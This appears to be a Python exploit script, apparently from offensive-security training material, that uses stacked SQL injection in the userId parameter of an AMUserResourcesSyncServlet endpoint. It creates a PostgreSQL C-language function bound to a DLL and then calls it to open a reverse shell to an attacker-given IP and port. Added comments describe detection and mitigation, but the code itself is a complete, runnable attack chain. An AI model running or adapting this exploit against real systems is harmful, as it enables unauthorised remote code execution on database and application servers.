import requests, sys
# Address of a local intercepting proxy (127.0.0.1:8080).
# NOTE(review): none of the visible requests.get() calls pass `proxies`, so
# as written no traffic is routed through it.
proxies = {"https": "https://127.0.0.1:8080"}

# Silence urllib3 warnings. make_request() sends with verify=False, which
# would otherwise emit an InsecureRequestWarning on every call.
requests.packages.urllib3.disable_warnings()
def log(msg):
    """Print *msg* to standard output on its own line."""
    print(msg)
def make_request(url, sql):
    """Send one GET request with *sql* substituted into the *url* template.

    Args:
        url: URL template containing a ``%s`` placeholder.
        sql: Statement text placed into the placeholder. This function
            does no encoding or validation of its own.

    Returns:
        The ``requests`` response object; callers in this file ignore it,
        so the HTTP status is never checked.
    """
    # Only the first 80 characters are echoed, to keep the log line short.
    preview = sql[0:80]
    log("[*] Executing query: %s" % preview)

    target = url % sql
    # verify=False turns off TLS certificate validation for this request.
    # The module-level `proxies` dict is not passed here.
    response = requests.get(target, verify=False)
    return response
def create_udf_func(url):
    """Request creation of the ``rev_shell(text,int)`` database function.

    The statement binds the function to the ``connect_back`` symbol of
    ``C:\\awae2.dll``. The visible code does not place that file anywhere,
    so it is expected to exist on the database host already.

    Defender notes: the statement is a ``CREATE ... FUNCTION ... LANGUAGE C``
    (PostgreSQL-style syntax -- confirm against the target DBMS). PostgreSQL
    restricts C-language function creation to superusers, so this only
    succeeds when the application's database role is over-privileged.
    Running the application under a least-privilege role and alerting on
    ``LANGUAGE C`` function creation in the statement log both address it.

    Args:
        url: Injectable URL template with a ``%s`` placeholder.
    """
    log("[+] Creating function...")
    # Earlier single-argument, plus-encoded variant kept for reference:
    # sql = "create+or+replace+function+rev_shell(text)+returns+void+as+$C:\\awae2.dll$,+$connect_back$+language+C+strict;"
    statement = 'create or replace function rev_shell(text,int) returns void as $C:\\awae2.dll$, $connect_back$ language C strict;'
    make_request(url, statement)
def trigger_udf(url, ip, port):
    """Request a call to the ``rev_shell`` function with *ip* and *port*.

    Args:
        url: Injectable URL template with a ``%s`` placeholder.
        ip: Address passed as the function's text argument; inserted into
            the statement without validation.
        port: Port passed as the integer argument; converted with ``int()``.

    Raises:
        ValueError: If *port* cannot be converted to an integer. This is
            raised after the log line is printed and before any request
            is sent by this function.

    Defender note: a database server process opening an outbound connection
    to an arbitrary host and port is the observable effect to watch for.
    Egress filtering on the database host limits it.
    """
    log("[+] Launching reverse shell...")
    call = "select rev_shell($%s$, %d)" % (ip, int(port))
    make_request(url, call)
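if __name__ == '__main__':
    # Usage: <script> serverIP:port attackerIP port
    try:
        server = sys.argv[1].strip()
        attacker = sys.argv[2].strip()
        port = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: %s serverIP:port attackerIP port" % sys.argv[0])
        # Exit non-zero so a calling shell or script can tell a usage error
        # from a completed run (the bare sys.exit() reported success).
        sys.exit(1)

    # The injection point is the userId parameter of
    # /servlet/AMUserResourcesSyncServlet: the value "1;<statement>;--"
    # appends a second statement after the application's own query.
    # Defender notes: this appears in web access logs as a GET whose userId
    # value contains semicolons and SQL keywords. The server-side fix is to
    # bind userId as a typed query parameter, not concatenate it into the
    # SQL text.
    sqli_url = "https://" + server + "/servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;%s;--"

    # Two requests are sent in order: create the function, then call it.
    create_udf_func(sqli_url)
    trigger_udf(sqli_url, attacker, port)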